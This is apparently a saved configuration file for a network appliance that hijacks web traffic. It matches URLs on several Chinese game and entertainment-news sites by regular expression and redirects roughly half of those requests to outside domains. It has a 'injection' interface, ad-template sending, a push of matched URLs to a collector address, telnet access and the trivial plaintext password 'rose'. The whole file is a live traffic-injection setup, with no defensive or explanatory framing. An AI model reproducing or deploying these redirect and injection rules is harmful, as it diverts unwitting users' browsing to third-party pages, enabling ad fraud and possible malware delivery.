!
! Zebra configuration saved from vty
!   2018/01/18 16:09:17
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
telnet port 2607
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
ad template send single
snet default push
adp dmac custom
adp smac custom
ori url add 0 ^y\.code\.17tanwan\.com(.*)\.html log,upush
ori url add 1 ^q\.code\.tanwan\.cn(.*)\.html redir http://himanibhasin.com/cq.html  50
ori url add 2  ^www\.hxnews\.com/news/yule/\Q$ redir http://sohot.news  50
ori url add 2 ^www\.hxnews\.com/news/yule/\Q$ redir http://himanibhasin.com/sohot.html 50
ori url add 3 ^news\.yule\.com\.cn/\Q$ redir http://himanibhasin.com/sohot.html 50
upush add tcp://192.168.1.4:5558
interface bussiness add eth1
interface injection add eth1
